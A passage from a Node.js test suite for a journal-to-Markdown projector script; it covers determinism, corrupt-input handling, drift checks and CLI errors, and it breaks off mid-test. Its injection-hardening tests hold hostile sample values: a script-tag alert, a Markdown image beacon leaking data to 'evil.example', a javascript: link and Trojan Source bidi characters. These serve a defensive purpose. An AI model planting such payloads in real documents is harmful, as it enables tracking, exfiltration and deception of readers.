import { test } from 'node:test';
import assert from 'node:assert/strict';
import {
  mkdtempSync,
  writeFileSync,
  readFileSync,
  appendFileSync,
  readdirSync,
  existsSync,
  chmodSync,
  mkdirSync,
  symlinkSync,
} from 'node:fs';
import { join } from 'node:path';
import { tmpdir } from 'node:os';
import { spawnSync, spawn } from 'node:child_process';
import { EVENT_TYPES, pairSpawns } from '../../scripts/journal.mjs';
import {
  STATE_FILE,
  PROGRESS_FILE,
  fold,
  inline,
  naturalCompare,
  parseArgs,
  progressLine,
  projectFile,
  renderProjections,
  warnings,
  checkFile,
  writeAtomic,
  writeAllAtomic,
  ticketStatus,
} from '../../scripts/project.mjs';

/** First line of every projection — used to spot a half-written document. */
const GENERATED_HEAD =
  '<!-- GENERATED by tyran scripts/project.mjs - DO NOT EDIT. Source of truth: journal.jsonl -->\n';

const SCRIPT = new URL('../../scripts/project.mjs', import.meta.url).pathname;
const FIXTURE = new URL('../fixtures/journal-demo.jsonl', import.meta.url).pathname;
const GOLDEN_DIR = new URL('../fixtures/golden/', import.meta.url).pathname;

const dir = () => mkdtempSync(join(tmpdir(), 'tyran-project-'));
const run = (args, opts = {}) =>
  spawnSync(process.execPath, [SCRIPT, ...args], { encoding: 'utf8', ...opts });

/** Write a journal from event objects (one JSON per line) into a fresh dir. */
function journal(events, { trailingNewline = true } = {}) {
  const d = dir();
  const file = join(d, 'journal.jsonl');
  const body = events.map((e) => (typeof e === 'string' ? e : JSON.stringify(e))).join('\n');
  writeFileSync(file, body + (trailingNewline && body !== '' ? '\n' : ''));
  return { d, file };
}

const ev = (over = {}) => ({
  ts: '2026-07-26T10:00:00.000Z',
  ev: 'checkpoint',
  init: 'demo',
  actor: 'conductor',
  data: { phase: 'F1', next_steps: ['a'] },
  ...over,
});

// --- golden files -------------------------------------------------------

test('golden: STATE.md is byte-identical to the committed projection', () => {
  const { files } = projectFile(FIXTURE);
  assert.equal(files[STATE_FILE], readFileSync(join(GOLDEN_DIR, STATE_FILE), 'utf8'));
});

test('golden: PROGRESS.md is byte-identical to the committed projection', () => {
  const { files } = projectFile(FIXTURE);
  assert.equal(files[PROGRESS_FILE], readFileSync(join(GOLDEN_DIR, PROGRESS_FILE), 'utf8'));
});

test('golden: the CLI writes exactly those bytes to --out-dir', () => {
  const out = dir();
  const r = run([FIXTURE, '--out-dir', out]);
  assert.equal(r.status, 0, r.stderr);
  for (const name of [STATE_FILE, PROGRESS_FILE]) {
    assert.deepEqual(readFileSync(join(out, name)), readFileSync(join(GOLDEN_DIR, name)));
  }
});

// --- idempotence / determinism -----------------------------------------

test('idempotence: a second run on an unchanged journal rewrites identical bytes', () => {
  const out = dir();
  assert.equal(run([FIXTURE, '--out-dir', out]).status, 0);
  const first = [STATE_FILE, PROGRESS_FILE].map((n) => readFileSync(join(out, n)));
  assert.equal(run([FIXTURE, '--out-dir', out]).status, 0);
  const second = [STATE_FILE, PROGRESS_FILE].map((n) => readFileSync(join(out, n)));
  assert.deepEqual(second, first);
  // and --check agrees that nothing drifted
  assert.equal(run([FIXTURE, '--out-dir', out, '--check']).status, 0);
});

test('determinism: reordering independent events does not change the output', () => {
  const lines = readFileSync(FIXTURE, 'utf8').trim().split('\n');
  const idx = lines.map((l, i) => [l, i]).filter(([l]) => l.includes('"ticket.created"')).map(([, i]) => i);
  assert.equal(idx.length, 3);
  const shuffled = [...lines];
  // fixed permutation (no RNG — a flaky test proves nothing)
  [shuffled[idx[0]], shuffled[idx[2]]] = [shuffled[idx[2]], shuffled[idx[0]]];
  const { file } = journal(shuffled);
  const a = projectFile(FIXTURE).files;
  const b = projectFile(file).files;
  assert.equal(b[STATE_FILE], a[STATE_FILE]);
  assert.equal(b[PROGRESS_FILE], a[PROGRESS_FILE]);
});

test('determinism: tickets sort naturally (T-2 before T-10), not lexically', () => {
  assert.ok(naturalCompare('T-2', 'T-10') < 0);
  assert.ok(naturalCompare('T-10', 'T-2') > 0);
  assert.equal(naturalCompare('T-2', 'T-2'), 0);
  const { files } = projectFile(FIXTURE);
  const rows = files[STATE_FILE].split('\n').filter((l) => l.startsWith('| `T-'));
  assert.deepEqual(rows.map((r) => r.split('|')[1].trim()), ['`T-1`', '`T-2`', '`T-10`']);
});

// --- resilience ---------------------------------------------------------

test('a truncated final line is skipped with a warning, exit 0', () => {
  const { d, file } = journal([ev({ ev: 'init.created', data: {} })]);
  appendFileSync(file, '{"ts":"2026-07-26T10:01:00.000Z","ev":"repo'); // crash mid-write
  const r = run([file, '--out-dir', d]);
  assert.equal(r.status, 0, r.stderr);
  assert.match(r.stderr, /truncated final line/);
  assert.match(readFileSync(join(d, STATE_FILE), 'utf8'), /\*\*Truncated final line:\*\* yes/);
  assert.match(readFileSync(join(d, STATE_FILE), 'utf8'), /\*\*Events folded:\*\* 1/);
});

test('an unknown event type is counted and named, never fatal', () => {
  const { d, file } = journal([ev(), ev({ ev: 'quantum.entangled', data: { x: 1 } })]);
  const r = run([file, '--out-dir', d]);
  assert.equal(r.status, 0, r.stderr);
  assert.match(r.stderr, /unknown event type "quantum\.entangled" x1/);
  const state = readFileSync(join(d, STATE_FILE), 'utf8');
  assert.match(state, /\*\*Unknown event types:\*\* quantum\.entangled/);
  assert.match(state, /`quantum\.entangled` 1/); // still visible in the type census
});

test('mid-file corruption and non-object lines are skipped and counted, exit 0', () => {
  const { d, file } = journal([ev(), 'GARBAGE LINE', '42', '"a string"', '[1,2]', ev({ ev: 'error', data: { class: 'x' } })]);
  const r = run([file, '--out-dir', d]);
  assert.equal(r.status, 0, r.stderr);
  const state = readFileSync(join(d, STATE_FILE), 'utf8');
  assert.match(state, /\*\*Corrupt lines skipped:\*\* 1/);
  assert.match(state, /\*\*Non-object lines skipped:\*\* 3/);
  // the skipped lines must not have been folded: only the 2 real events count
  assert.match(state, /\*\*Events folded:\*\* 2/);
  assert.match(r.stderr, /corrupt line\(s\) mid-file/);
});

test('a file that is not a journal is refused instead of erasing good projections', () => {
  const out = dir();
  assert.equal(run([FIXTURE, '--out-dir', out]).status, 0);
  const before = [STATE_FILE, PROGRESS_FILE].map((n) => readFileSync(join(out, n)));

  const { file } = journal(['%PDF-1.7 binary garbage', 'not json either', '<<<<>>>>']);
  const r = run([file, '--out-dir', out]);
  assert.equal(r.status, 2);
  assert.match(r.stderr, /does not look like a journal/);
  assert.match(r.stderr, /refusing to overwrite projections/);
  const after = [STATE_FILE, PROGRESS_FILE].map((n) => readFileSync(join(out, n)));
  assert.deepEqual(after, before, 'projections were overwritten by a non-journal input');
});

test('a one-line file with no trailing newline is refused too (truncatedTail is damage)', () => {
  // readJournal calls a final line without a newline `truncatedTail`, not a
  // bad line — so minified JSON, a token file or a single log line would slip
  // through a gate that only counts corrupt/malformed lines.
  const out = dir();
  assert.equal(run([FIXTURE, '--out-dir', out]).status, 0);
  const before = [STATE_FILE, PROGRESS_FILE].map((n) => readFileSync(join(out, n)));

  for (const content of ['GARBAGE NO TRAILING NEWLINE', 'a-single-line-token-file', '{"ev":"cut off"']) {
    const { file } = journal([content], { trailingNewline: false });
    const r = run([file, '--out-dir', out]);
    assert.equal(r.status, 2, `"${content}" was projected instead of refused`);
    assert.match(r.stderr, /does not look like a journal/);
    assert.match(r.stderr, /a truncated final line/);
    assert.deepEqual(
      [STATE_FILE, PROGRESS_FILE].map((n) => readFileSync(join(out, n))),
      before,
      `"${content}" overwrote the projections`,
    );
  }
});

test('a journal path that is a directory fails cleanly', () => {
  const d = dir();
  const r = run([d, '--out-dir', d]);
  assert.equal(r.status, 2);
  assert.match(r.stderr, /journal path is a directory, not a file/);
  assert.deepEqual(readdirSync(d), []);
  assert.throws(() => projectFile(d), /directory, not a file/);
});

test('an EMPTY journal is still legal — the refusal only fires on pure noise', () => {
  const { d, file } = journal([]);
  assert.equal(run([file, '--out-dir', d]).status, 0);
  // one readable event among the damage is enough to project
  const { d: d2, file: f2 } = journal([ev(), 'GARBAGE']);
  const r = run([f2, '--out-dir', d2]);
  assert.equal(r.status, 0, r.stderr);
  assert.match(readFileSync(join(d2, STATE_FILE), 'utf8'), /\*\*Events folded:\*\* 1/);
});

test('an empty journal projects empty documents, exit 0', () => {
  const { d, file } = journal([]);
  const r = run([file, '--out-dir', d]);
  assert.equal(r.status, 0, r.stderr);
  const state = readFileSync(join(d, STATE_FILE), 'utf8');
  assert.match(state, /^<!-- GENERATED by tyran/);
  assert.match(state, /\*\*Events folded:\*\* 0/);
  assert.match(readFileSync(join(d, PROGRESS_FILE), 'utf8'), /^# PROGRESS: 0% · 0\/0 tickets merged · phase: \(none\)$/m);
});

test('sections without data render as explicitly empty, never disappear', () => {
  const { d, file } = journal([]);
  assert.equal(run([file, '--out-dir', d]).status, 0);
  const state = readFileSync(join(d, STATE_FILE), 'utf8');
  for (const heading of [
    'Agents',
    'Ledger',
    'Open gates',
    'All gates',
    'Open leases',
    'Lease releases by a non-holder',
    'Decisions',
    'Retro entries',
    'Errors',
    'Resume steps',
  ]) {
    const section = state.split(`## ${heading}\n`)[1];
    assert.ok(section !== undefined, `section "${heading}" vanished`);
    assert.ok(section.startsWith('\n_none_\n'), `section "${heading}" is not explicitly empty`);
  }
});

// --- agents / ledger semantics ------------------------------------------

test('an unclosed spawn stays visible as running', () => {
  const state = fold({
    events: [
      ev({ ev: 'spawn', data: { agent: 'impl-9', role: 'implementer', ticket: 'T-9', worktree: 'wt-9' } }),
    ],
  });
  assert.equal(state.agents.length, 1);
  assert.equal(state.agents[0].status, 'running');
  const { files } = renderProjections({ events: [ev({ ev: 'spawn', data: { agent: 'impl-9', role: 'implementer' } })] });
  assert.match(files[STATE_FILE], /\| impl-9 \|.*\*\*running \(no report yet\)\*\*/);
});

/**
 * TWO OPEN SPAWNS OF ONE NAME — the state ADR-18 made unrepresentable.
 *
 * These cases used to assert a ticket-first pairing rule that lived only here,
 * in `fold()`. S-E3-6 removed it, and did not replace it with an option: the
 * rule's sole justification was journals written before the ADR-18 guard, and
 * that population was measured at zero — no such journal exists in this
 * repository, in its git history, or on the machine that develops it. Journals
 * are append-only, so a rule kept "for old files" can never be retired; it is
 * a permanent second semantics, not a migration window (ADR-21).
 *
 * What replaces it is not a worse guess but a LOUD one. `journal.pairSpawns`
 * is the single implementation, it pairs oldest-first by name, and `warnings()`
 * now says the pairing is ambiguous — where previously two consumers resolved
 * the same journal differently and neither told anyone.
 */
test('two open spawns of one name: pairing is oldest-first, and it says so out loud', () => {
  const events = [
    ev({ ev: 'spawn', data: { agent: 'impl', role: 'implementer', ticket: 'T-1' } }),
    ev({ ev: 'spawn', data: { agent: 'impl', role: 'implementer', ticket: 'T-2' } }),
    ev({ ev: 'report', data: { agent: 'impl', verdict: 'REFUTED', ticket: 'T-2' } }),
  ];
  const state = fold({ events });
  const byTicket = Object.fromEntries(state.agents.map((a) => [a.ticket, a]));
  // Oldest-first: the report closes the T-1 spawn, because that is the answer
  // journal.pairSpawns gives and there is now only one answer.
  assert.equal(byTicket['T-1'].status, 'reported');
  assert.equal(byTicket['T-1'].verdict, 'REFUTED');
  assert.equal(byTicket['T-2'].status, 'running');
  // The projection agrees with journal.pairSpawns, codepoint for codepoint.
  const { open } = pairSpawns(events);
  assert.deepEqual([...open.keys()], ['impl']);
  assert.equal(open.get('impl').length, 1);
  // And the ambiguity is REPORTED rather than silently resolved.
  assert.ok(
    warnings(state).some((w) => /2 open spawns/.test(w) && /ambiguous/.test(w)),
    'an ambiguous pairing must not be silent',
  );
  // The Ledger still records the report against the ticket the report NAMED —
  // that reads data.ticket directly and never depended on pairing.
  assert.equal(state.ticketList.find((t) => t.id === 'T-2').report.verdict, 'REFUTED');
});

test('the projection and journal.pairSpawns agree on who is still open', () => {
  // The conformance check for the OTHER half of ADR-21, on ordinary journals:
  // one spawn per name, which is the only shape `append` will write.
  const events = [
    ev({ ev: 'spawn', data: { agent: 'a1', role: 'r', ticket: 'T-1' } }),
    ev({ ev: 'spawn', data: { agent: 'a2', role: 'r', ticket: 'T-2' } }),
    ev({ ev: 'spawn', data: { agent: 'a3', role: 'r', ticket: 'T-3' } }),
    ev({ ev: 'report', data: { agent: 'a3', verdict: 'v3', ticket: 'T-3' } }),
    ev({ ev: 'report', data: { agent: 'a1', verdict: 'v1', ticket: 'T-1' } }),
  ];
  const state = fold({ events });
  assert.deepEqual(
    state.agents.map((a) => `${a.ticket}:${a.status}:${a.verdict ?? '-'}`),
    ['T-1:reported:v1', 'T-2:running:-', 'T-3:reported:v3'],
  );
  const stillRunning = state.agents.filter((a) => a.status === 'running').map((a) => a.agent);
  assert.deepEqual(stillRunning, [...pairSpawns(events).open.keys()]);
  assert.deepEqual(warnings(state), [], 'a well-formed journal must produce no pairing warning');
});

test('a report with no ticket closes the open spawn of that name', () => {
  const state = fold({
    events: [
      ev({ ev: 'spawn', data: { agent: 'impl', role: 'r', ticket: 'T-1' } }),
      ev({ ev: 'report', data: { agent: 'impl', verdict: 'done' } }),
    ],
  });
  assert.deepEqual(state.agents.map((a) => a.status), ['reported']);
});

test('a report whose ticket matches no open spawn does not steal another ticket', () => {
  const state = fold({
    events: [
      ev({ ev: 'spawn', data: { agent: 'impl', role: 'r', ticket: 'T-1' } }),
      ev({ ev: 'report', data: { agent: 'impl', verdict: 'done', ticket: 'T-9' } }),
    ],
  });
  // closes the open spawn of the same name (ADR-18 keeps that unique), and the
  // ledger still records the report against the ticket it named
  assert.equal(state.agents.length, 1);
  assert.equal(state.ticketList.find((t) => t.id === 'T-9').report.verdict, 'done');
});

test('a report without a matching spawn is surfaced, not dropped', () => {
  const state = fold({ events: [ev({ ev: 'report', data: { agent: 'ghost', verdict: 'done' } })] });
  assert.equal(state.agents[0].status, 'reported (no spawn event)');
});

test('a ticket referenced only by merge still appears in the ledger', () => {
  const { files } = renderProjections({
    events: [ev({ ev: 'merge', data: { ticket: 'T-42', sha: 'deadbee' } })],
  });
  assert.match(files[STATE_FILE], /\| `T-42` _\(no ticket\.created\)_ \|/);
  assert.match(files[STATE_FILE], /merged \(deadbee\)/);
});

test('a lease released by a non-holder stays open and is reported', () => {
  const state = fold({
    events: [
      ev({ ev: 'lease.acquired', data: { resource: 'wt-a', holder: 'impl-1' } }),
      ev({ ev: 'lease.released', data: { resource: 'wt-a', holder: 'intruder' } }),
    ],
  });
  assert.equal(state.leases.size, 1);
  assert.equal(state.mismatchedReleases.length, 1);
});

test('a blockage opens on blocked, clears on movement and on stronger lifecycle events', () => {
  const base = [
    ev({ ev: 'ticket.created', ts: '2026-07-26T09:00:00.000Z', data: { id: 'T-1' } }),
    ev({ ev: 'progress', ts: '2026-07-26T09:01:00.000Z', data: { agent: 'impl-1', state: 'blocked', ticket: 'T-1', detail: 'lease held' } }),
  ];
  const open = fold({ events: base });
  assert.equal(open.blockages.size, 1);
  assert.equal(open.blockages.get('T-1').detail, 'lease held');

  const unblocked = fold({ events: [...base, ev({ ev: 'progress', ts: '2026-07-26T09:02:00.000Z', data: { agent: 'impl-1', state: 'unblocked' } })] });
  assert.equal(unblocked.blockages.size, 0, 'unblocked clears');

  const reported = fold({ events: [...base, ev({ ev: 'report', ts: '2026-07-26T09:02:00.000Z', data: { agent: 'impl-1', verdict: 'done', ticket: 'T-1' } })] });
  assert.equal(reported.blockages.size, 0, 'a report by the same agent clears');

  const merged = fold({ events: [...base, ev({ ev: 'merge', ts: '2026-07-26T09:02:00.000Z', data: { ticket: 'T-1', sha: 'abc' } })] });
  assert.equal(merged.blockages.size, 0, 'a merge on the ticket clears');

  // a ticketless blockage keys on the agent and still clears on movement
  const agentOnly = fold({ events: [ev({ ev: 'progress', ts: '2026-07-26T09:01:00.000Z', data: { agent: 'impl-2', state: 'blocked' } })] });
  assert.equal(agentOnly.blockages.size, 1);
});

test('a ticket.status override wins the status line, clears on lifecycle, and NEVER moves the percent', () => {
  const base = [
    ev({ ev: 'ticket.created', ts: '2026-07-26T09:00:00.000Z', data: { id: 'T-1' } }),
    ev({ ev: 'ticket.created', ts: '2026-07-26T09:00:01.000Z', data: { id: 'T-2' } }),
    ev({ ev: 'ticket.status', ts: '2026-07-26T09:01:00.000Z', data: { ticket: 'T-1', column: 'parked', reason: 'pricing open' } }),
  ];
  const parked = fold({ events: base });
  const t1 = parked.ticketList.find((t) => t.id === 'T-1');
  assert.match(ticketStatus(t1), /^parked \(set by ticket\.status\)$/);
  assert.equal(parked.percent, 0, 'an override is a lane, not progress');

  const merged = fold({ events: [...base, ev({ ev: 'merge', ts: '2026-07-26T09:02:00.000Z', data: { ticket: 'T-1', sha: 'abc' } })] });
  const t1m = merged.ticketList.find((t) => t.id === 'T-1');
  assert.match(ticketStatus(t1m), /^merged /, 'merge clears the override');
  assert.equal(merged.percent, 50);
});

test('the Agents table shows the last signal only on running rows', () => {
  const events = [
    ev({ ev: 'spawn', ts: '2026-07-26T09:00:00.000Z', data: { agent: 'impl-1', role: 'implementer' } }),
    ev({ ev: 'progress', ts: '2026-07-26T09:01:00.000Z', data: { agent: 'impl-1', state: 'working' } }),
    ev({ ev: 'spawn', ts: '2026-07-26T09:02:00.000Z', data: { agent: 'impl-2', role: 'implementer' } }),
    ev({ ev: 'progress', ts: '2026-07-26T09:03:00.000Z', data: { agent: 'impl-2', state: 'working' } }),
    ev({ ev: 'report', ts: '2026-07-26T09:04:00.000Z', data: { agent: 'impl-2', verdict: 'done' } }),
  ];
  const text = renderProjections({ events }).files[STATE_FILE];
  const rows = text.split('\n').filter((l) => l.startsWith('| impl-'));
  const running = rows.find((l) => l.startsWith('| impl-1'));
  const done = rows.find((l) => l.startsWith('| impl-2'));
  assert.match(running, /working at 2026-07-26T09:01:00\.000Z/);
  assert.ok(!/working at/.test(done), 'a signal that outlived the report is stale and must not render');
});

test('every event type of the closed set is folded into a section (no silent loss)', () => {
  const sample = {
    'init.created': {},
    'plan.accepted': {},
    'ticket.created': { id: 'T-1' },
    'ticket.status': { ticket: 'T-1', column: 'parked' },
    spawn: { agent: 'a', role: 'implementer' },
    report: { agent: 'a', verdict: 'done' },
    progress: { agent: 'a', state: 'blocked', ticket: 'T-1', detail: 'waiting on a lease' },
    gate: { kind: 'tests', result: 'pass' },
    review: { ticket: 'T-1', verdict: 'APPROVE', by: 'r' },
    merge: { ticket: 'T-1', sha: 'abc' },
    decision: { id: 'D-1', text: 't' },
    finding: { area: 'src/**', claim: 'c', proof: 'p' },
    'lease.acquired': { resource: 'r', holder: 'h' },
    'lease.released': { resource: 'r', holder: 'h' },
    checkpoint: { phase: 'F1', next_steps: ['s'] },
    'retro.entry': { kind: 'skill', target: 't' },
    error: { class: 'c' },
  };
  assert.deepEqual(Object.keys(sample).sort(), [...EVENT_TYPES].sort());
  const state = fold({ events: EVENT_TYPES.map((t) => ev({ ev: t, data: sample[t] })) });
  assert.equal(state.unknownTypes.size, 0, `unfolded types: ${[...state.unknownTypes.keys()]}`);
  assert.equal(state.total, EVENT_TYPES.length);
});

test('progress percentage counts merged tickets and survives a zero denominator', () => {
  assert.match(progressLine(fold({ events: [] })), /^PROGRESS: 0% · 0\/0 tickets merged · phase: \(none\)$/);
  const state = fold({
    events: [
      ev({ ev: 'ticket.created', data: { id: 'T-1' } }),
      ev({ ev: 'ticket.created', data: { id: 'T-2' } }),
      ev({ ev: 'merge', data: { ticket: 'T-1', sha: 'a' } }),
      ev({ data: { phase: 'E2', next_steps: [] } }),
    ],
  });
  assert.match(progressLine(state), /^PROGRESS: 50% · 1\/2 tickets merged · phase: E2$/);
});

test('progress rounds (1/3 is 33%, not 33.33 and not floor-of-something-else)', () => {
  const thirds = fold({
    events: [
      ev({ ev: 'ticket.created', data: { id: 'T-1' } }),
      ev({ ev: 'ticket.created', data: { id: 'T-2' } }),
      ev({ ev: 'ticket.created', data: { id: 'T-3' } }),
      ev({ ev: 'merge', data: { ticket: 'T-1', sha: 'a' } }),
    ],
  });
  assert.equal(thirds.percent, 33);
  const twoThirds = fold({
    events: [
      ev({ ev: 'ticket.created', data: { id: 'T-1' } }),
      ev({ ev: 'ticket.created', data: { id: 'T-2' } }),
      ev({ ev: 'ticket.created', data: { id: 'T-3' } }),
      ev({ ev: 'merge', data: { ticket: 'T-1', sha: 'a' } }),
      ev({ ev: 'merge', data: { ticket: 'T-2', sha: 'b' } }),
    ],
  });
  assert.equal(twoThirds.percent, 67); // round, not floor (floor would say 66)
});

// --- injection hardening -------------------------------------------------

/** Built from code points so no raw control/bidi byte ever enters this file. */
const INVISIBLE = [
  0x0000, 0x0007, 0x001b, 0x007f, 0x0085, 0x009f, // C0, DEL, NEL, C1
  0x200b, 0x200c, 0x200d, 0x200e, 0x200f, // zero-width + direction marks
  0x202a, 0x202b, 0x202c, 0x202d, 0x202e, // bidi embeddings + overrides (RLO)
  0x2066, 0x2067, 0x2068, 0x2069, // bidi isolates
  0xfeff, // BOM / zero-width no-break
].map((c) => String.fromCodePoint(c));
/** Predicate over code points — a literal character class here would put
    the very bytes under test into this file. Newline is legal in a doc. */
const isInvisible = (cp) =>
  cp < 0x20 ||
  (cp >= 0x7f && cp <= 0x9f) ||
  (cp >= 0x200b && cp <= 0x200f) ||
  (cp >= 0x202a && cp <= 0x202e) ||
  (cp >= 0x2066 && cp <= 0x2069) ||
  cp === 0xfeff;
const hasInvisible = (s) => [...s].some((c) => c !== '\n' && isInvisible(c.codePointAt(0)));

test('hostile journal data cannot break tables, the header, or inject HTML', () => {
  const nasty = 'a | b\nrow2 | c `code` <script>alert(1)</script> --> & \\pipe';
  const { files } = renderProjections({
    events: [ev({ ev: 'ticket.created', data: { id: 'T-1', title: nasty } })],
  });
  const state = files[STATE_FILE];
  const row = state.split('\n').find((l) => l.startsWith('| `T-1`'));
  assert.equal(row.split('|').length - 2, 6); // exactly the 6 declared columns
  assert.ok(!state.includes('<script>'));
  assert.ok(!row.includes('\n'));
  // No journal value can ever emit a raw `<`, `>` or `|` — so it can neither
  // inject HTML nor close/forge the GENERATED comment.
  const body = state.slice(state.indexOf('\n# STATE'));
  assert.ok(!/[<>]/.test(body), 'raw angle bracket leaked into the document body');
  assert.equal((state.match(/<!--/g) ?? []).length, 2);
  assert.equal((state.match(/-->/g) ?? []).length, 2);
  assert.equal(
    state.split('\n')[0],
    '<!-- GENERATED by tyran scripts/project.mjs - DO NOT EDIT. Source of truth: journal.jsonl -->',
  );
});

test('a journal value cannot render as a Markdown link or remote image', () => {
  // An <img src> to a foreign host is a read beacon plus an exfiltration
  // channel: the URL can carry up to MAX_CELL characters of journal text.
  const beacon = '![x](https://evil.example/track.png?j=leak) [click](javascript:alert(1))';
  const { files } = renderProjections({
    events: [
      ev({ ev: 'ticket.created', data: { id: 'T-1', title: beacon } }),
      ev({ ev: 'decision', data: { id: 'D-1', text: beacon } }),
      ev({ data: { phase: beacon, next_steps: [beacon] } }),
    ],
  });
  assert.ok(!/[[\]]/.test(files[STATE_FILE]), 'bracket survived into STATE.md');
  // PROGRESS.md legitimately contains generator-made checkboxes `- [ ]`/`- [x]`
  const progressWithoutCheckboxes = files[PROGRESS_FILE].replace(/^- \[[ x]\] /gm, '- ');
  assert.ok(!/[[\]]/.test(progressWithoutCheckboxes), 'bracket survived into PROGRESS.md');
  assert.ok(files[STATE_FILE].includes('&#91;') && files[STATE_FILE].includes('&#93;'));
  assert.ok(!files[STATE_FILE].includes('](')); // no link syntax can form
});

test('bidi overrides and zero-width characters never reach the document', () => {
  // An unterminated RLO mirrors every following column: a journal value could
  // rewrite the document the conductor makes decisions from (Trojan Source).
  const trojan = `admin${INVISIBLE.join('')}rotcerid`;
  const { files } = renderProjections({
    events: [
      ev({ ev: 'ticket.created', data: { id: 'T-1', title: trojan } }),
      ev({ ev: 'spawn', data: { agent: trojan, role: trojan, worktree: trojan } }),
      ev({ ev: 'error', data: { class: trojan, detail: trojan } }),
      ev({ data: { phase: trojan, next_steps: [trojan] } }),
    ],
  });
  for (const [name, content] of Object.entries(files)) {
    assert.ok(!hasInvisible(content), `invisible/bidi code point survived into ${name}`);
  }
  // and the visible text is preserved, just neutralized
  assert.ok(files[STATE_FILE].includes('admin'));
});

test('the source files carry NO raw control or bidi bytes, only escape notation', () => {
  // Twice during this story a tool turned six-character escape notation
  // actual byte while writing these files. A raw NUL also makes grep return
  // nothing at all, silently. The defence cannot be author attentiveness.
  for (const path of [SCRIPT, new URL(import.meta.url).pathname]) {
    const src = readFileSync(path, 'utf8');
    const offenders = [...src]
      .map((c, i) => [c, i])
      .filter(([c]) => c !== '\n' && c !== '\t' && isInvisible(c.codePointAt(0)))
      .map(([c, i]) => `U+${c.codePointAt(0).toString(16).padStart(4, '0')} at offset ${i}`);
    assert.deepEqual(offenders, [], `raw invisible bytes in ${path}`);
  }
});

test('inline() SHOWS every listed invisible code point, and deletes none of them', () => {
  // It used to blank them, so a value made only of invisible characters was
  // indistinguishable from an empty one and nothing anywhere said anything had
  // been dropped. ADR-19 correction 1: an exclusion must never be silent.
  for (const ch of INVISIBLE) {
    const point = ch.codePointAt(0);
    const out = inline(`a${ch}b`);
    assert.ok(!hasInvisible(out), `U+${point.toString(16)} survived inline()`);
    const hex = point.toString(16).toUpperCase().padStart(4, '0');
    assert.equal(out, `a&lt;U+${hex}&gt;b`);
  }
});

test('review/merge without a ticket land in a visible pseudo-ticket, not the void', () => {
  const state = fold({
    events: [
      ev({ ev: 'merge', data: { sha: 'abc1234' } }),
      ev({ ev: 'review', data: { verdict: 'APPROVE', by: 'r' } }),
    ],
  });
  assert.deepEqual(state.ticketList.map((t) => t.id), ['(no ticket)']);
  assert.equal(state.ticketList[0].merge.sha, 'abc1234');
});

test('a lease event without a resource is still visible', () => {
  const state = fold({ events: [ev({ ev: 'lease.acquired', data: { holder: 'h' } })] });
  assert.deepEqual([...state.leases.keys()], ['(no resource)']);
});

test('inline() normalizes, escapes and caps a value', () => {
  assert.equal(inline(null), '&mdash;');
  assert.equal(inline('   '), '&mdash;');
  assert.equal(inline('a|b'), 'a&#124;b');
  assert.equal(inline('<b>'), '&lt;b&gt;');
  assert.equal(inline('a\nb'), 'a b');
  assert.equal(inline(['x', 'y']), 'x, y');
  const long = inline('x'.repeat(500));
  assert.ok(Array.from(long).length <= 160, `cell too long: ${long.length}`);
  assert.ok(long.endsWith('…'));
});

// --- --check -------------------------------------------------------------

test('--check exits 0 on fresh projections and 1 after a hand edit', () => {
  const out = dir();
  assert.equal(run([FIXTURE, '--out-dir', out]).status, 0);
  const ok = run([FIXTURE, '--out-dir', out, '--check']);
  assert.equal(ok.status, 0, ok.stderr);
  assert.match(ok.stdout, /projections up to date/);

  const path = join(out, STATE_FILE);
  writeFileSync(path, readFileSync(path, 'utf8').replace('## Errors', '## Errors (I edited this by hand)'));
  const drift = run([FIXTURE, '--out-dir', out, '--check']);
  assert.equal(drift.status, 1);
  assert.match(drift.stderr, /drift/);
  assert.match(drift.stderr, /1 of \d+ line\(s\) differ, first at line \d+/);
  assert.match(drift.stderr, /regenerate with/);
});

test('--check is byte-exact: whitespace, CRLF, BOM and a missing final newline all drift', () => {
  const { files } = projectFile(FIXTURE);
  const good = files[STATE_FILE];
  const out = dir();
  const path = join(out, STATE_FILE);
  const cases = {
    'trailing space': good.replace('## Errors', '## Errors '),
    'missing final newline': good.replace(/\n$/, ''),
    CRLF: good.replace(/\n/g, '\r\n'),
    BOM: String.fromCodePoint(0xfeff) + good,
    'extra blank line': good + '\n',
  };
  for (const [name, content] of Object.entries(cases)) {
    writeFileSync(path, content);
    assert.equal(checkFile(path, good).ok, false, `${name} was NOT detected as drift`);
  }
  writeFileSync(path, good);
  assert.equal(checkFile(path, good).ok, true);
  assert.equal(run([FIXTURE, '--out-dir', out, '--check']).status, 1); // PROGRESS.md still missing
});

test('--check reports a missing projection instead of crashing', () => {
  const out = dir();
  const r = run([FIXTURE, '--out-dir', out, '--check']);
  assert.equal(r.status, 1);
  assert.match(r.stderr, /missing on disk/);
  assert.deepEqual(readdirSync(out), []); // --check writes NOTHING
});

// --- CLI contract --------------------------------------------------------

test('CLI: an unknown flag fails loudly (never silently ignored)', () => {
  const out = dir();
  const r = run([FIXTURE, '--out-dir', out, '--verbose']);
  assert.equal(r.status, 2);
  assert.match(r.stderr, /unknown flag --verbose/);
  assert.deepEqual(readdirSync(out), []);
  assert.throws(() => parseArgs(['j.jsonl', '--nope']), /unknown flag --nope/);
  assert.throws(() => parseArgs(['j.jsonl', '--out-dir']), /requires a value/);
  assert.throws(() => parseArgs(['j.jsonl', '--out-dir', '--check']), /requires a value/);
  assert.throws(() => parseArgs(['a.jsonl', 'b.jsonl']), /unexpected extra argument/);
  assert.throws(() => parseArgs(['j.jsonl', '--out-dir', 'a', '--out-dir', 'b']), /given twice/);
  assert.throws(() => parseArgs(['j.jsonl', '--check', '--check']), /given twice/);
  assert.deepEqual(parseArgs(['j.jsonl', '--check']), { journal: 'j.jsonl', outDir: undefined, check: true });
});

test('CLI: a missing journal file exits non-zero with a readable message', () => {
  const r = run([join(dir(), 'nope.jsonl'), '--out-dir', dir()]);
  assert.equal(r.status, 2);
  assert.match(r.stderr, /journal not found: .*nope\.jsonl/);
  const usage = run([]);
  assert.equal(usage.status, 2);
  assert.match(usage.stderr, /usage: project\.mjs/);
});

test('CLI: --out-dir defaults to the journal directory', () => {
  const { d, file } = journal([ev()]);
  const r = run([file]);
  assert.equal(r.status, 0, r.stderr);
  assert.ok(existsSync(join(d, STATE_FILE)) && existsSync(join(d, PROGRESS_FILE)));
});

test('CLI: invoked through a symlinked path, the projector still writes files', () => {
  // Same guard bug as journal.mjs, with a nastier symptom: `project.mjs` run
  // through a link exited 0, printed nothing, and wrote no projection — so a
  // caller checking only the exit code believed STATE.md had been refreshed
  // while it still held whatever was there before (or nothing at all).
  const base = mkdtempSync(join(tmpdir(), 'tyran-symlink-'));
